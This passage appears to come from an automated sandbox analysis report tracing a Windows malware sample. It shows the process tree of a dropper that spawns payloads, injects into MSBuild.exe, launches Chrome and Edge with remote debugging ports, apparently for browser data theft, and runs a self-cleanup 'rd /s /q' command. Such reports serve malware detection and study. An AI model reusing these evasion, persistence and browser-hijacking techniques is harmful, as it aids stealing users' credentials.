5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 1896 5424 chrome.exe 105 PID 5424 wrote to memory of 1896 5424 chrome.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2560
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1516
-
-
C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5788 -
C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe"C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5196 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5424 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffb100dcf8,0x7fffb100dd04,0x7fffb100dd106⤵PID:1028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2052,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2032 /prefetch:26⤵PID:436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2272 /prefetch:36⤵PID:1896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2532 /prefetch:86⤵PID:4660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3260 /prefetch:16⤵
- Uses browser remote debugging
PID:3784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3312 /prefetch:16⤵
- Uses browser remote debugging
PID:3652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4324 /prefetch:26⤵
- Uses browser remote debugging
PID:5404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4724,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4668 /prefetch:16⤵
- Uses browser remote debugging
PID:3840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5356 /prefetch:86⤵PID:5420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4460 /prefetch:86⤵PID:776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5556,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5636 /prefetch:86⤵PID:4796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5708,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5720 /prefetch:86⤵PID:1416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5624,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5580 /prefetch:86⤵PID:1944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5616,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5724 /prefetch:86⤵PID:3940
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6088 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x258,0x7fffb037f208,0x7fffb037f214,0x7fffb037f2206⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2180,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:26⤵PID:1632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:36⤵PID:4612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2436,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:86⤵PID:3824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3548,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:16⤵
- Uses browser remote debugging
PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3580,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:16⤵
- Uses browser remote debugging
PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4212,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:16⤵
- Uses browser remote debugging
PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4232,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:26⤵
- Uses browser remote debugging
PID:4900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5132,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:86⤵PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3764,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:86⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:86⤵PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3796,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:86⤵PID:2936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6312,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:86⤵PID:5152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6312,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:86⤵PID:3808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6660,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6640 /prefetch:86⤵PID:3516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6680,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6824 /prefetch:86⤵PID:4284
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\gdjmg" & exit5⤵
- System Location Discovery: System Language Discovery
PID:4552 -
C:\Windows\SysWOW64\timeout.exetimeout /t 116⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6588
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4580
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361700101\b842abf8f3.exe"C:\Users\Admin\AppData\Local\Temp\10361700101\b842abf8f3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\10361710101\ec9a0b61cd.exe"C:\Users\Admin\AppData\Local\Temp\10361710101\ec9a0b61cd.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4536
-
-
C:\Users\Admin\AppData\Local\Temp\10361720101\74957b3341.exe"C:\Users\Admin\AppData\Local\Temp\10361720101\74957b3341.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1192 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5020 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffb100dcf8,0x7fffb100dd04,0x7fffb100dd105⤵PID:5984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --subproc-heap-profiling --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1992 /prefetch:25⤵PID:4620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --subproc-heap-profiling --field-trial-handle=1600,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1940 /prefetch:35⤵PID:1480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --subproc-heap-profiling --field-trial-handle=2392,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2344 /prefetch:85⤵PID:672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3324 /prefetch:15⤵
- Uses browser remote debugging
PID:1636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3344 /prefetch:15⤵
- Uses browser remote debugging
PID:2376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4248,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4292 /prefetch:25⤵
- Uses browser remote debugging
PID:2004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4672,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:15⤵
- Uses browser remote debugging
PID:5472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=4864,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5264 /prefetch:85⤵PID:3312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5468,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5480 /prefetch:85⤵PID:1060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5548,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5300 /prefetch:85⤵PID:2652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5260,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5372 /prefetch:85⤵PID:5224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5704,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5420 /prefetch:85⤵PID:2136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5340,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5288 /prefetch:85⤵PID:4108
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3612 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x210,0x7fffaccef208,0x7fffaccef214,0x7fffaccef2205⤵PID:1084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:35⤵PID:4608
-
-
